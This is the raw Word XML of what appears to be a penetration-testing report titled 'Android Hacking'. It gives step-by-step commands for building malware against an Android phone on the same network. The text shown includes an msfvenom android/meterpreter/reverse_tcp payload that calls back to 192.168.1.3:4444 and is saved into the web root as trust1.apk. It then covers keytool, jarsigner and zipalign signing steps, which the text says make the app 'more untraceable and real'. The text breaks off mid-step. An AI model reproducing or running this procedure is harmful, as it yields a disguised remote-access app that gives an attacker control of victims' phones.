    <w:p w14:paraId="6FE0B755" w14:textId="628A4BD3" w:rsidR="008877EA" w:rsidRPr="00871742" w:rsidRDefault="008877EA" w:rsidP="008E0CB7">
      <w:r w:rsidRPr="00871742">
        <w:t>First step to proceed Pen testing is information gathering and scanning, so now just boot Kali Linux and</w:t>
      </w:r>
      <w:r w:rsidR="004E3D8C" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> Android</w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> smartphone but make sure both device Kali and Android Smartphone should be in same network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD764C" w14:textId="2B260CF5" w:rsidR="008877EA" w:rsidRPr="00630833" w:rsidRDefault="00871742" w:rsidP="00871742">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc148744919"/>
      <w:r w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r w:rsidR="004E3D8C" w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Android Hacking</w:t>
      </w:r>
      <w:r w:rsidR="008877EA" w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Information Gathering and Scanning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidR="008877EA" w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B305F57" w14:textId="2BD6C6E7" w:rsidR="008877EA" w:rsidRPr="00871742" w:rsidRDefault="008877EA" w:rsidP="008877EA">
      <w:r w:rsidRPr="00871742">
        <w:t>We first need to see our IP assigned to both the s</w:t>
      </w:r>
      <w:r w:rsidR="000E7F21" w:rsidRPr="00871742">
        <w:t>ystems, to check that we will first have to open terminal by Ctrl + Alt +T. Now write the command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E7F21" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E7F21" w:rsidRPr="00871742">
        <w:t>” to check IP address assigned to the interface of attacker machine means our machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4244F63D" w14:textId="161BBB4A" w:rsidR="003D76B5" w:rsidRPr="00871742" w:rsidRDefault="003D76B5" w:rsidP="008877EA">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40ECBCE1" wp14:editId="5516EA04">
            <wp:extent cx="4673840" cy="1111307"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3449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5642" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4673840" cy="1111307"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="158DBB1C" w14:textId="1821C5DB" w:rsidR="00646893" w:rsidRPr="00871742" w:rsidRDefault="00646893" w:rsidP="008877EA">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">Now to check IP address of </w:t>
      </w:r>
      <w:r w:rsidR="003D76B5" w:rsidRPr="00871742">
        <w:t>Android device</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> we will need to use “</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>netdiscover</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t>” command on Lin</w:t>
      </w:r>
      <w:r w:rsidR="00B47B9E" w:rsidRPr="00871742">
        <w:t xml:space="preserve">ux terminal to scan IP address in subnet range. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D8D352" w14:textId="7D501040" w:rsidR="000E7F21" w:rsidRPr="00871742" w:rsidRDefault="003D76B5" w:rsidP="008877EA">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78E62ABE" wp14:editId="038C5CAB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2406774" cy="628682"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="7805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433" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2406774" cy="628682"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB8D596" w14:textId="3ACBB183" w:rsidR="008877EA" w:rsidRPr="00871742" w:rsidRDefault="008877EA" w:rsidP="008877EA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AC41E6A" w14:textId="5ACAE3F1" w:rsidR="003D76B5" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="008877EA">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3497762F" wp14:editId="6BEC5DF8">
            <wp:extent cx="5731510" cy="2622550"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="56607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7607" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2622550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AAFD84" w14:textId="7188014A" w:rsidR="003D76B5" w:rsidRPr="00871742" w:rsidRDefault="00A256DB" w:rsidP="008877EA">
      <w:r w:rsidRPr="00871742">
        <w:t>Next,</w:t>
      </w:r>
      <w:r w:rsidR="003D76B5" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> we will start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D76B5" w:rsidRPr="00871742">
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D76B5" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> server by command “service apache2 start” and then to check the status of server “service apache2 status”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C36BF11" w14:textId="0ADD77DB" w:rsidR="003F0C62" w:rsidRPr="00871742" w:rsidRDefault="003D76B5" w:rsidP="008877EA">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D4BC786" wp14:editId="37F93E3D">
            <wp:extent cx="5731510" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8709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334" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2971800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="003F0C62" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED4906B" w14:textId="4A974406" w:rsidR="00421A75" w:rsidRPr="00871742" w:rsidRDefault="00A256DB" w:rsidP="008877EA">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">Now we need to create </w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t>malware</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> and to develop it we will use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:t>. We will create malware with .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:t>apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> format</w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> since android executable extension is .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t>apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="190A332D" w14:textId="7D1C5DE0" w:rsidR="00A256DB" w:rsidRPr="00871742" w:rsidRDefault="00A256DB" w:rsidP="008877EA">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p android/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=192.168.1.3 LPORT=4444 R &gt; /var/www/html/</w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>trust1</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.apk</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t>” will use this command to create malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3D2F4F" w14:textId="74C273EF" w:rsidR="003D3E31" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="008877EA">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62E67D46" wp14:editId="6A088ED4">
            <wp:extent cx="5731510" cy="837565"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="188916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6493" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="837565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB6BBD0" w14:textId="39E079A0" w:rsidR="008548F0" w:rsidRPr="00871742" w:rsidRDefault="00446153" w:rsidP="008877EA">
      <w:r w:rsidRPr="00871742">
        <w:t>Next,</w:t>
      </w:r>
      <w:r w:rsidR="008548F0" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> we need to generate key, sign the app and will use zip align to make the application more untraceable and real.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D6ABB7" w14:textId="311B18F4" w:rsidR="0076566D" w:rsidRPr="00871742" w:rsidRDefault="008548F0" w:rsidP="008877EA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00871742">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">To generate </w:t>
      </w:r>
      <w:r w:rsidR="0076566D" w:rsidRPr="00871742">
        <w:t>key,</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> we will use </w:t>
      </w:r>
      <w:r w:rsidR="008938A3" w:rsidRPr="00871742">
        <w:t xml:space="preserve">this command </w:t>
      </w:r>
      <w:r w:rsidR="008938A3" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008938A3" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>keytool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008938A3" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008938A3" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>genkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008938A3" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -V -keystore /home/kali/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008938A3" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>key.keystore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008938A3" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -alias </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008938A3" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>piechart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008938A3" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008938A3" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>keyalg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008938A3" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> RSA -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008938A3" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>keysize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008938A3" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2048 -validity 10000”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07889EA7" w14:textId="0B94E16A" w:rsidR="00446153" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="008877EA">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6998663D" wp14:editId="18584635">
            <wp:extent cx="5731510" cy="2781300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4338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9374" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2781300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DAD5DE" w14:textId="3CBD7AE5" w:rsidR="00421A75" w:rsidRPr="00871742" w:rsidRDefault="008548F0" w:rsidP="008877EA">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00446153" w:rsidRPr="00871742">
        <w:t>Next, we need to sign the app by jar signer, but jar signer is not preinstalled in Kali Linux so need to install it first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA46ADC" w14:textId="473B1207" w:rsidR="00446153" w:rsidRPr="00871742" w:rsidRDefault="00446153" w:rsidP="008877EA">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="402F6119" wp14:editId="34603101">
            <wp:extent cx="5731510" cy="2476500"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11741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6097" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2476500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="724976C0" w14:textId="77777777" w:rsidR="00630833" w:rsidRDefault="008938A3" w:rsidP="008877EA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00871742">
        <w:t>Next,</w:t>
      </w:r>
      <w:r w:rsidR="00446153" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> we need to sign the </w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t>app by jar signer, we will use command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00896E34" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>jarsigner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00896E34" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -verbose -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00896E34" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sigalg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00896E34" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SHA1withRSA -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00896E34" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>digestalg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00896E34" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SHA1 -keystore /home/kali/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00896E34" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>key.keystore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00896E34" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>trust1.apk</w:t>
      </w:r>
      <w:r w:rsidR="00896E34" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00896E34" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>piechart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00896E34" w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D47DB4" w14:textId="17F377D9" w:rsidR="00896E34" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="008877EA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CB1057F" wp14:editId="1E7260C9">
            <wp:extent cx="5731510" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6111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19570" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2819400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEEDE5C" w14:textId="04C84E7F" w:rsidR="00896E34" w:rsidRPr="00871742" w:rsidRDefault="00896E34" w:rsidP="008877EA">
      <w:r w:rsidRPr="00871742">
        <w:t>Now after this to optimize the application and to make application work properly with key and signature we will use a tool zip aligner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AF800C" w14:textId="6C281F2C" w:rsidR="00A01A9E" w:rsidRPr="00871742" w:rsidRDefault="00A01A9E" w:rsidP="00A01A9E">
      <w:r w:rsidRPr="00871742">
        <w:t>Command I used “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:t>zipalign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> -v 4 t</w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t>rust1</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">.apk </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t>rust</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t>.apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11152816" w14:textId="007C059D" w:rsidR="00A01A9E" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="008877EA">
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30F019F9" wp14:editId="75933386">
            <wp:extent cx="5503545" cy="1581150"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="73325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6811" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5513423" cy="1583988"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0F3907" w14:textId="2B0D5FCD" w:rsidR="00A01A9E" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="008877EA">
      <w:r w:rsidRPr="00871742">
        <w:t>Make sure that your</w:t>
      </w:r>
      <w:r w:rsidR="00A01A9E" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> output file “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A01A9E" w:rsidRPr="00871742">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t>rust</w:t>
      </w:r>
      <w:r w:rsidR="00A01A9E" w:rsidRPr="00871742">
        <w:t>.apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A01A9E" w:rsidRPr="00871742">
        <w:t>” is hav</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00A01A9E" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">executable </w:t>
      </w:r>
      <w:r w:rsidR="00A01A9E" w:rsidRPr="00871742">
        <w:t xml:space="preserve">access to </w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t>do that we will use the command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:b/>
